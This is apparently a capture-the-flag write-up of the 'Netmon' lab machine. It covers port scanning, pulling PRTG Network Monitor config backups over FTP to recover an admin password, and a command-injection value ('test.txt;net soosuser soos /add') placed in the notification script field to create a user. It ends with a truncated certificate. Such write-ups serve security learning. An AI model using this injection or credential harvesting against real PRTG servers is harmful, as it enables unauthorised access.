Netmon

Personal Rating: Easy

Enumeration

The initial nmap scan shows many open ports that indicate a Windows DC:

sudo nmap -p- -sV <IP>

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC

I found this webpage http://<TARGETIP>/index.htm where PTRG can be read as service name. It is a login form. During research about that service a vulnerability stands out, which should work for the exact version of the service that is running on the machine:

https://www.reddit.com/r/sysadmin/comments/835dai/prtg_exposes_domain_accounts_and_passwords_in/

This reddit post contains all information needed to exploit the exposed ftp share.

ftp 10.10.10.152

ls /ProgramData/Paessler/PRTG Network Monitor/

get "PRTG Configuration.dat"
get "PRTG Configuration.old.bak"

The old config contains the user prtgadmin with the password PrTg@dmin2018

The config is huge, but searching for "password" in kate the password was found quickly.

The new backup was last edited in 2019, so I tried PrTg@dmin2019 which worked as password for the login form.

I tried this payload: windows/http/prtg_authenticated_rce but it didn't work.

PRTG Command Injection

I found out that theres a vulnerability that you can inject scripts into the Execute Script parameters of "Notifications" in the PRTG Admin Center.

test.txt;net soosuser soos /add

From there I could make the new user an admin and log onto the machine with that user. I also found an ssh key for the existing admin user.

-----BEGIN CERTIFICATE-----
MIICdjCCAd+gAwIBAgIBADANBgkqhkiG9w0BAQQFADA3MQswCQYDVQQGEwJOQTEM
<SNIP>
vgpGR4Wd9aPvgw==
-----END CERTIFICATE-----
PreviousMiraiNextNibbles

Last updated